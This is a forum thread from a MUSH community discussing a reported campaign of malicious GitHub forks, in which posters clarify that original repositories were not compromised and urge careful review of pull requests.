Don’t forget we moved!
https://brandmu.day/
GitHub Bug Hunt Gone Terribly Wrong
-
Apparently a number of malware users, for the last 14 days have been trying to target various projects in GitHub, and trying to implant malicious malware into 35k forked projects. Looks like GitHub clamped down on it pretty quick, but just thinking how if some of the big major projects could’ve affected…it’s a bit freaking yikes.
I know a lot of MU runners use GitHub to work on their own various projects. I wasn’t sure if anyone here had heard of this attack and I doubt anyone’s mush GitHub stuff was affected, but considering it was 35k potentially affected projects, I just wanted to ask if everyone’s stuff is okay.
And apparently it was one big test of cybersecurity which…seems like a whole OTHER yikes.
To those who might be wondering what happened, here’s a video that explains everything that happened.
-
The important distinction is that no repositories were compromised. This was attackers creating forks of popular repos and inserting code that would compromise people who used the fork.
So for instance …/evennia/evennia wasn’t infected, but someone might have made …/malwarefork/evennia and hoped that someone not paying attention would grab that version instead, exposing themselves.
-
@shit-piss-love Trying to prove a point something having an exposure or weakness on a public facing thing seems like…a bad idea?
Like the video stated, if someone tried to affect the Linux kernel, again, bad idea if you’re just trying to prove a point.
-
I hadn’t heard that it was an awareness trick. BTW the link you posted doesn’t seem to work.
edit: Ahh okay I get what you mean about proving a point now; people are saying the original tweet was just to get clout. The fact that they have not posted a retraction is bad form for sure.
-
@shit-piss-love Thanks. Fixed it to a proper link.
-
Just to add to the clarification, and I watched the video to make sure I had the same context, nothing was compromised and there’s little chance any of this code found its way into any open source projects. Even the “example” brought up in the video with the version change actual had a line for post install addition that was so obviously malicious that I’m surprised the guy in the video didn’t say anything.
@shit-piss-love is 100% right on this and being able to fork and make pull requests is expected operation for github. Whether there was an attempt at collecting a bug bounty or proving a point (though I don’t see the point), it’s a bit of a nothing-burger.
I’d ask that you change the title of the thread. I know it’s not intentional, but it’s misleading regarding the security of github projects.
-
@glitch That’s fair. I was writing this thread as I was watching video content on the whole thing and I had already created the thread about five minutes into watching it.
It’s a valid point. My main intention was to bring awareness to the situation since I knew plenty of people who run mushes also have a lot of their code on GitHub, so it was an attempt to suggest that, ‘maybe go check your stuff just in case’. So wording the thread that way is on me for not just, oh I don’t know, finish watching the video.
Regardless, name of thread changed.
-
It was good to point it out. I only knew what I do about this because I work in this industry. This strategy of trying to compromise people through modified clones is a constant thing. What was notable in this case was the original tweet claiming huge numbers like it was something new, and it went viral.
Something worth noting for people working on github. An extension of this strategy is for the attackers to open PRs, with the compromising code, back to the original repo hoping that a maintainer will assume that a forked repo represents a good faith development effort and fail to fully review the code and merge it. At that point, the core repo is compromised.
It’s always important to fully review code before you merge.
